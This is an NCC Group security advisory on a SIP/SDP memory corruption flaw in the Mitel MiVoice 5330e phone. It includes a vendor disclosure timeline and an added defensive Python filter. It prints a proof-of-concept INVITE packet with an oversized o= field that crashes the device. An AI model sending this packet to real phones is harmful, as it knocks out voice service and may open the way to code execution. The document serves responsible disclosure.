Technical Advisory: Mitel MiVoice 5330e Memory Corruption Flaw

Vendor: Mitel
Vendor URL:
Versions affected: 5330e IP Phone
Systems Affected: Mitel MiVoice
Author: Mattia Reggiani mattia.reggiani[at]nccgroup[dot]trust
Advisory URL:
CVE Identifier:
Risk: Low-High (case dependent) – Denial of Service and possible Remote Code Execution


The Mitel MiVoice 5330e VoIP device is affected by a memory corruption flaw in the SIP/SDP packet handling functionality. An attacker can exploit this issue remotely, by sending a particular pattern of SIP/SDP packets, to cause a denial of service on affected devices and possibly achieve remote code execution.


SIP/SDP packet handling functionality.


Denial of service and potential remote code execution


The following SIP/SDP packets were used to trigger the memory corruption condition:

<- SNIP -> INVITE sip:7301@ SIP/2.0 Via: SIP/2.0/UDP;rport;branch=branchyPStYido2t Max-Forwards: 70 From: "7302"<sip:7302@>;tag=IKdO1hnVEu To: <sip:7301@> Call-ID: calljkhWCVlITROWK9o0NVsJCEQ0VxWMGz@ CSeq: 13100 INVITE Contact: <sip:7302@> User-Agent: Test Agent Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO Accept: application/sdp Content-Type: application/sdp Content-Length: 1086  v=0 o=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0 0 IN IP4 s=-  c=IN IP4 t=0 0 m=audio 16782 RTP/AVP 0 a=rtpmap:0 PCM/8000 a=extmap:1 urn:ietf:params:rtp-hdrext:csrc-audio-level a=extmap:2 urn:ietf:params:rtp-hdrext:ssrc-audio-level a=rtcp-xr:voip-metrics m=video 16541 RTP/AVP 96 99 a=recvonly a=rtpmap:96 H264/90000 a={inj[28]}:96 profile-level-id=4DE01f;packetization-mode=1 a=imageattr:96 send * recv [x=[0-1366],y=[0-768]] a=rtpmap:99 H264/90000 a=fmtp:99 profile-level-id=4DE01f a=imageattr:99 send * recv [x=[0-1366],y=[0-768]]  SIP/2.0 400 Bad Request Via: SIP/2.0/UDP;rport;branch=branchyPStYido2t From:"7302" <sip:7302@>;tag=IKdO1hnVEu To:<sip:7301@>;tag=5b33b7f1-3ac-2f1e08b1 CSeq:13100 INVITE User-Agent:Mitel-5330e-SIP-Phone 08000FBFA477 Call-ID:calljkhWCVlITROWK9o0NVsJCEQ0VxWMGz@ Content-Length:0 <- SNIP -> 

As shown in the following screenshot, a denial of service condition was triggered:

Figure 1 – Triggering memory corruption condition
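A defensive pre-filter for the anomalies visible in the packet above, as an added example that is not part of the original advisory or of Mitel's code: it flags oversized SDP lines, an o= line without six fields, and attribute names outside the RFC 4566 token character set. The 256-byte limit, the function names and the sample messages are assumptions constructed for illustration; the advisory does not state which field triggers the flaw.

```python
import re

MAX_SDP_LINE = 256  # assumed limit for this sketch, not a vendor or RFC value
# RFC 4566 token-char set: printable ASCII minus separators such as " ( ) , / : [ \ ]
TOKEN = re.compile(r"[\x21\x23-\x27\x2A\x2B\x2D\x2E\x30-\x39\x41-\x5A\x5E-\x7E]+")


def sdp_body(message: str) -> str:
    """Return the body of a SIP message (the text after the first blank line)."""
    _, _, body = message.replace("\r\n", "\n").partition("\n\n")
    return body


def inspect_sdp(message: str, max_line: int = MAX_SDP_LINE) -> list[str]:
    """List anomalies in the SDP body of a SIP message; an empty list means clean."""
    findings = []
    for number, line in enumerate(sdp_body(message).split("\n"), start=1):
        if not line:
            continue
        if len(line) > max_line:
            findings.append(f"line {number}: {line[:2]} field is {len(line)} bytes")
        if not re.match(r"[a-z]=", line):
            findings.append(f"line {number}: not in <type>=<value> form")
            continue
        kind, value = line[0], line[2:]
        if kind == "o" and len(value.split(" ")) != 6:
            findings.append(f"line {number}: o= needs 6 fields")
        if kind == "a":
            name = value.split(":", 1)[0]  # attribute name precedes the first colon
            if not TOKEN.fullmatch(name):
                findings.append(f"line {number}: attribute name {name!r} is not a token")
    return findings


# Constructed samples (not captured traffic): one well-formed offer, and one with an
# oversized o= username plus an attribute name containing non-token characters.
HEADERS = "INVITE sip:7301@192.0.2.10 SIP/2.0\r\nContent-Type: application/sdp\r\n\r\n"
GOOD = HEADERS + ("v=0\r\no=- 1 1 IN IP4 192.0.2.20\r\ns=-\r\nc=IN IP4 192.0.2.20\r\n"
                  "t=0 0\r\nm=audio 16782 RTP/AVP 0\r\na=rtpmap:0 PCMU/8000\r\n")
BAD = HEADERS + ("v=0\r\no=" + "A" * 600 + " 0 0 IN IP4 192.0.2.20\r\ns=-\r\n"
                 "a=bad[1]:96 packetization-mode=1\r\n")

if __name__ == "__main__":
    for label, msg in (("good", GOOD), ("bad", BAD)):
        print(label, inspect_sdp(msg) or "clean")
```

A check of this kind belongs on a SIP proxy or session border controller in front of the phones, where a message with findings can be rejected before it reaches the device.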



According to the vendor, the Mitel 5330 phone has been superseded by Mitel 68xx series phones; it is therefore recommended to replace the affected device with the new version.

After a further investigation, the vendor released the public advisory with mitigation and recommended actions (

Vendor Communication

2018-07-16 Advisory reported to Mitel
2018-07-16 Mitel acknowledgement
2018-07-17 Details provided
2018-07-30 Mitel did not plan any mitigation since the affected version has been superseded by a new series of phones
2018-08-10 Mitel agreed for publishing the advisory
2018-09-25 Mitel released Product Security Advisory 18-0009

About NCC Group

NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face. We are passionate about making the Internet safer and revolutionising the way in which organisations think about cyber security.

Written by:  Mattia Reggiani
